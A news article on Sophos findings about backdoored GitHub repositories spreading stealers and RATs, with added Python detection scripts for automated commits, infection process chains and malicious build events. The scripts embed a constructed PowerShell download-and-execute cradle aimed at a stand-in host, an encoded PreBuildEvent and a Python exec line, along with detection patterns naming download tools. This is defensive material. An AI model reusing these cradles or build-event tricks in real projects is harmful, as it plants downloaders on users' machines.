Malware Hidden in Backdoored GitHub Code Repositories

by Tekmono Editorial Team
06/06/2025
in News

A sophisticated campaign is targeting hackers, gamers, and researchers with backdoored source code distributed through GitHub repositories, granting attackers remote access to infected devices.

The operation was uncovered by Sophos researchers investigating “Sakura RAT,” a remote access trojan reportedly available on GitHub. Their analysis found that the Sakura RAT code itself was largely non-functional, but the Visual Studio project contained a malicious PreBuildEvent. A pre-build event is a command that MSBuild runs before compilation starts, so anyone who simply built the project executed the attacker's command, which downloaded and installed malware.

Further investigation linked the publisher “ischhfd83” to a network of 141 GitHub repositories, 133 of which contained hidden backdoors, indicating a coordinated malware distribution effort. The backdoors were embedded in several ways: Python scripts carrying obfuscated payloads, malicious screensaver (.scr) files (which Windows runs as ordinary executables) utilizing Unicode tricks, JavaScript files containing encoded payloads, and malicious Visual Studio PreBuild events.

Some repositories were abandoned in late 2023, but many remain active with automated commits designed to create a false sense of legitimacy and activity. These automated workflows result in unusually high commit counts; one project created in March 2025 had nearly 60,000 commits, with the average across all repositories standing at 4,446 at the time of Sophos’ initial data collection.

Each repository consistently featured three contributors, and different publisher accounts were employed, with no single account managing more than nine repositories. Traffic to these malicious repositories is driven by promotion on YouTube, Discord, and cybercrime forums. The media attention surrounding Sakura RAT is believed to have drawn unsuspecting users to search for it on GitHub.
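One way to turn the activity signals described above into a check, as an added example that is not Sophos' method: score a repository's `git log` output for its commit rate and for how regular the gaps between commits are. A cron-driven workflow produces thousands of evenly spaced commits; people do not. The thresholds (20 commits per day, a gap coefficient of variation under 0.1) are assumptions chosen for illustration, and both sample histories are constructed.

```python
"""Score a repository's commit history for signs of automation.

Added example, not Sophos' tooling. Input is the output of
`git log --format='%ct %ae'` (unix timestamp, author e-mail), one commit per
line. Two signals from the article are scored: commits per day far beyond what
a hobby project produces, and inter-commit gaps so regular they point to a
scheduled job rather than a person. Thresholds are assumptions; both sample
logs below are constructed.
"""
import random
import statistics
from typing import Dict, List, Tuple


def parse_git_log(text: str) -> List[Tuple[int, str]]:
    """Parse '<unix-ts> <author>' lines into (timestamp, author), oldest first."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, author = line.split(maxsplit=1)
        entries.append((int(ts), author.strip()))
    return sorted(entries)


def commit_stats(entries: List[Tuple[int, str]]) -> Dict[str, float]:
    """Commit count, distinct authors, commits/day and the coefficient of
    variation (stdev / mean) of the gaps between consecutive commits."""
    if not entries:
        return {"commits": 0, "authors": 0, "per_day": 0.0, "gap_cv": float("inf")}
    times = [t for t, _ in entries]
    authors = {a for _, a in entries}
    span_days = max((times[-1] - times[0]) / 86400, 1.0)  # floor the lifetime at one day
    gaps = [b - a for a, b in zip(times, times[1:])]
    mean_gap = statistics.mean(gaps) if gaps else 0.0
    # Near 0 for a cron job firing on a fixed schedule, well above 0.1 for humans.
    gap_cv = statistics.pstdev(gaps) / mean_gap if mean_gap > 0 else float("inf")
    return {"commits": len(times), "authors": len(authors),
            "per_day": len(times) / span_days, "gap_cv": gap_cv}


def automation_signals(entries: List[Tuple[int, str]], max_per_day: float = 20.0,
                       max_gap_cv: float = 0.1, min_commits: int = 50) -> List[str]:
    """Return the reasons a history looks machine-generated (empty list if none)."""
    s = commit_stats(entries)
    reasons = []
    if s["per_day"] > max_per_day:
        reasons.append(f"{s['per_day']:.0f} commits/day averaged over the repo's lifetime")
    if s["commits"] >= min_commits and s["gap_cv"] < max_gap_cv:
        reasons.append(f"inter-commit gap CV {s['gap_cv']:.3f}: metronomic, looks scheduled")
    return reasons


# Constructed histories. START is 2025-03-01T00:00:00Z.
START = 1_740_787_200
# A workflow committing every 30 minutes for about six weeks: 2000 commits, one author.
BOT_LOG = "\n".join(f"{START + i * 1800} bot@example.invalid" for i in range(2000))
# Three people committing at irregular intervals (one hour to five days apart).
random.seed(7)
_t, _lines = START, []
for _ in range(60):
    _t += random.randint(3600, 5 * 86400)
    _lines.append(f"{_t} {random.choice(['a', 'b', 'c'])}@example.invalid")
HUMAN_LOG = "\n".join(_lines)

if __name__ == "__main__":
    for label, log in (("bot", BOT_LOG), ("human", HUMAN_LOG)):
        print(label, commit_stats(parse_git_log(log)), automation_signals(parse_git_log(log)))
```

On the bot history both signals fire (about 48 commits/day, gap CV of 0); the human history, with 60 commits spread over months, triggers neither. Run it against a real clone with `git log --format='%ct %ae' | python3 script.py` after replacing the samples with `sys.stdin.read()`.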

When a victim downloads these files, simply running or building the code triggers a multi-stage infection. A VBS script runs first and launches PowerShell, which downloads an encoded payload from hardcoded URLs; that stage fetches a 7-Zip archive from GitHub and runs an Electron app named ‘SearchFilter.exe’.

The Electron app contains a bundled archive with heavily obfuscated ‘main.js’ and related files, including code for system profiling, command execution, disabling Windows Defender, and retrieving additional payloads. The secondary payloads downloaded by the backdoor include well-known information stealers and remote access trojans such as Lumma Stealer, AsyncRAT, and Remcos, all equipped with extensive data theft capabilities.
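The chain described above, expressed as detection logic over process-creation events. This is an added example, not Sophos' detection content: it rebuilds a process tree from constructed Sysmon-style records and flags PowerShell spawned beneath a script host that carries a download cradle (decoding `-EncodedCommand` first, since that is how such stages hide), then tags whatever that PowerShell's descendants launch from a staging directory. The wscript.exe, powershell.exe and SearchFilter.exe names come from the chain above; the 7za.exe extractor, the directory layout and the example.invalid URL are assumptions.

```python
"""Detect the VBS -> PowerShell -> archive -> Electron chain in process-creation events.

Added example, not Sophos' detection content. Events are constructed
Sysmon-style dicts (pid, ppid, image, cmdline). Rule 1 fires on PowerShell
under wscript/cscript whose (decoded) command contains a download cradle;
rules 2/3 fire on children of that PowerShell that run out of a staging
directory, distinguishing archive extraction from payload execution. The 7za.exe
extractor, paths and URL are assumptions.
"""
import base64
import re
from typing import Dict, List, Optional

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer|FromBase64String",
    re.IGNORECASE,
)
STAGING_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)
ARCHIVE_EXTRACT = re.compile(r"\b7z[a-z]*(?:\.exe)?\s+[xe]\b|\.7z\b", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; recover the plaintext or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def lineage(by_pid: Dict[int, dict], pid: int) -> List[dict]:
    """The process with this pid and its ancestors, walking ppid links until the root or a cycle."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: List[dict]) -> List[dict]:
    by_pid = {e["pid"]: e for e in events}
    alerts, cradles = [], set()
    # Rule 1: PowerShell beneath a script host with a download cradle (decoded if -enc was used).
    for e in events:
        if image_name(e["image"]) not in SHELLS:
            continue
        if not any(image_name(p["image"]) in SCRIPT_HOSTS for p in lineage(by_pid, e["ppid"])):
            continue
        text = decode_encoded_command(e["cmdline"]) or e["cmdline"]
        if CRADLE.search(text):
            cradles.add(e["pid"])
            alerts.append({"rule": "script-host-powershell-cradle", "pid": e["pid"], "command": text})
    # Rules 2/3: anything launched from a staging directory whose ancestry includes a cradle.
    for e in events:
        if not STAGING_DIR.search(e["image"]):
            continue
        if any(p["pid"] in cradles for p in lineage(by_pid, e["ppid"])):
            rule = "archive-extraction" if ARCHIVE_EXTRACT.search(e["cmdline"]) else "staged-payload-execution"
            alerts.append({"rule": rule, "pid": e["pid"], "image": e["image"]})
    return alerts


# Constructed sample: one infection chain plus two benign look-alikes that must not fire.
CRADLE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.txt')"
ENC = base64.b64encode(CRADLE_TEXT.encode("utf-16le")).decode()
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
TEMP = "C:\\Users\\victim\\AppData\\Local\\Temp"
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": "C:\\Windows\\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 100, "image": "C:\\Windows\\System32\\wscript.exe",
     "cmdline": "wscript.exe C:\\Users\\victim\\Downloads\\cheat-src\\build.vbs"},
    {"pid": 202, "ppid": 201, "image": PS, "cmdline": "powershell.exe -w hidden -ep bypass -enc " + ENC},
    {"pid": 203, "ppid": 202, "image": TEMP + "\\7za.exe",
     "cmdline": "7za.exe x " + TEMP + "\\sf.7z -o" + TEMP + "\\sf"},
    {"pid": 204, "ppid": 202, "image": TEMP + "\\sf\\SearchFilter.exe", "cmdline": "SearchFilter.exe"},
    {"pid": 301, "ppid": 100, "image": PS, "cmdline": "powershell.exe -NoProfile -Command Get-ChildItem"},
    {"pid": 401, "ppid": 1, "image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "wscript.exe logon.vbs"},
    {"pid": 402, "ppid": 401, "image": PS, "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only pids 202, 203 and 204 produce alerts; the administrator's interactive shell (301) and the logon script that runs PowerShell without a cradle (402) stay silent, which is the precision a rule like this needs before it goes into a SIEM.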

The trojanized repositories target a broad range of users, including gamers, students, and cybersecurity researchers, using lures such as game cheats, mod tools, and fake exploits. Given how easily anyone can publish source code on GitHub, and that commit activity can be manufactured, users are strongly advised to read the source carefully and inspect any pre- and post-build events in the project before compiling software downloaded from open-source repositories.
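The checks recommended above, worked as a small triage script that also covers the embedding methods listed earlier. This is an added example, not Sophos' tooling or code from the repositories it describes. It scans a downloaded source tree for suspicious pre-/post-build events in Visual Studio project files, for executables disguised by Unicode bidirectional overrides or double extensions (an assumption about what the article's "Unicode tricks" refer to), and for long base64 blobs in scripts. The sample repository, command patterns and example.invalid URL are constructed.

```python
"""Triage a downloaded source tree for the backdoor patterns the article describes.

Added example, not Sophos' tooling or the repositories' code. The checks are
heuristics: build events that spawn a shell, script host or download tool;
file names using Unicode bidirectional controls or double extensions to pass
off a .scr/.exe binary as a document (assumed to be the 'Unicode tricks');
and long base64 runs inside script sources. All sample files are constructed.
"""
import base64
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

# Commands that have no business in the build step of a hobby project.
SUSPICIOUS_CMD = re.compile(
    r"(powershell|pwsh|cmd(\.exe)?\s+/c|wscript|cscript|mshta|certutil|bitsadmin|curl|wget"
    r"|-enc(odedcommand)?\b|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\biex\b|FromBase64String)",
    re.IGNORECASE,
)
# Bidi overrides/isolates; U+202E (RIGHT-TO-LEFT OVERRIDE) is the classic extension-flipping trick.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e", "\u2066", "\u2067", "\u2068", "\u2069"}
EXEC_EXT = {"scr", "exe", "com", "pif", "bat", "cmd", "vbs", "js", "ps1"}
DOC_EXT = {"pdf", "txt", "jpg", "png", "gif", "doc", "docx", "zip", "mp4", "rar"}
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def find_build_events(project_xml: str) -> List[Tuple[str, str]]:
    """Return (kind, command) for every PreBuildEvent/PostBuildEvent and every
    MSBuild <Exec Command="..."> task. Handles .csproj (command as element text)
    and .vcxproj (command nested in <Command>) and ignores XML namespaces."""
    events = []
    for el in ET.fromstring(project_xml).iter():
        tag = el.tag.split("}")[-1]
        if tag in ("PreBuildEvent", "PostBuildEvent"):
            cmd = el.text or ""
            for child in el:
                if child.tag.split("}")[-1] == "Command" and child.text:
                    cmd = child.text
            if cmd.strip():
                events.append((tag, cmd.strip()))
        elif tag == "Exec" and el.get("Command"):
            events.append(("Exec", el.get("Command").strip()))
    return events


def disguised_filename(name: str) -> Optional[str]:
    """Explain why a file name looks disguised, or return None if it looks honest."""
    if any(ch in BIDI_CONTROLS for ch in name):
        return "contains a Unicode bidirectional control character; the rendered name hides the real extension"
    parts = name.lower().split(".")
    if len(parts) >= 3 and parts[-1] in EXEC_EXT and parts[-2] in DOC_EXT:
        return "double extension: looks like a document but runs as an executable"
    return None


def find_encoded_blobs(source: str) -> List[bytes]:
    """Return the first 40 decoded bytes of every long, valid base64 run in a script."""
    previews = []
    for m in BASE64_RUN.finditer(source):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:
            continue  # a long identifier or hash, not base64
        previews.append(decoded[:40])
    return previews


def scan_repo(files: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """files maps a relative path to its text. Returns (path, check, detail) findings."""
    findings = []
    for path, content in files.items():
        reason = disguised_filename(path.rsplit("/", 1)[-1])
        if reason:
            findings.append((path, "filename", reason))
        lower = path.lower()
        if lower.endswith((".csproj", ".vcxproj", ".props", ".targets")):
            try:
                for kind, cmd in find_build_events(content):
                    if SUSPICIOUS_CMD.search(cmd):
                        findings.append((path, kind, cmd[:80]))
            except ET.ParseError as exc:
                findings.append((path, "unparsable-project", str(exc)))
        if lower.endswith((".py", ".js", ".vbs", ".ps1", ".bat", ".cmd")):
            for preview in find_encoded_blobs(content):
                findings.append((path, "encoded-blob", repr(preview)))
    return findings


# Constructed stage-one downloader, the kind of command a malicious build event runs.
STAGE_ONE = (
    "powershell -NoProfile -WindowStyle Hidden -Command "
    "\"$u='http://example.invalid/p.txt';"
    "$d=(New-Object Net.WebClient).DownloadString($u);"
    "Invoke-Expression ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($d)))\""
)
ENC_UTF16 = base64.b64encode(STAGE_ONE.encode("utf-16le")).decode()  # what -EncodedCommand expects
ENC_UTF8 = base64.b64encode(STAGE_ONE.encode()).decode()

SAMPLE_REPO = {  # constructed
    "Cheat/Cheat.csproj": (
        '<Project Sdk="Microsoft.NET.Sdk"><PropertyGroup><OutputType>WinExe</OutputType>'
        "<PreBuildEvent>powershell -w hidden -ep bypass -enc " + ENC_UTF16 + "</PreBuildEvent>"
        "</PropertyGroup></Project>"
    ),
    "Cheat/Program.cs": "class Program { static void Main() { } }",
    "Clean/Clean.csproj": (
        '<Project Sdk="Microsoft.NET.Sdk"><PropertyGroup>'
        "<PreBuildEvent>echo Building $(ProjectName)</PreBuildEvent></PropertyGroup></Project>"
    ),
    "tools/update.py": "import base64, subprocess\nexec(base64.b64decode('" + ENC_UTF8 + "'))\n",
    "docs/guide\u202efdp.scr": "MZ...",  # renders as 'guidercs.pdf' but is a .scr executable
    "docs/guide.txt": "plain notes",
}

if __name__ == "__main__":
    for path, check, detail in scan_repo(SAMPLE_REPO):
        print(f"{path}: {check}: {detail}")
```

The benign `echo Building $(ProjectName)` pre-build step in Clean.csproj is not reported, while the encoded PowerShell build event, the base64 blob in update.py and the bidi-disguised .scr all are. To run it over a real checkout, build the `files` dict by walking the directory and reading each file as text (binary files can be skipped; the name check still applies to them).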
